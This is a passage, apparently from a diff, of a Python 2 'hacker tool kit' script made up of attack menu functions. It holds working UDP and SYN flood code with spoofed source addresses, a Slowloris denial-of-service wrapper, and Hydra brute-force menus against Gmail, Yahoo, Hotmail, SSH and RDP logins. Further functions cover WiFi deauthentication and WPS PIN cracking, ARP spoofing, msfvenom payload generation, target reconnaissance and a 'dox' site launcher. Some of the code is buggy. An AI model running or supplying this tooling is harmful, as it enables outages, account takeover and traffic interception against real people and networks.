DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and 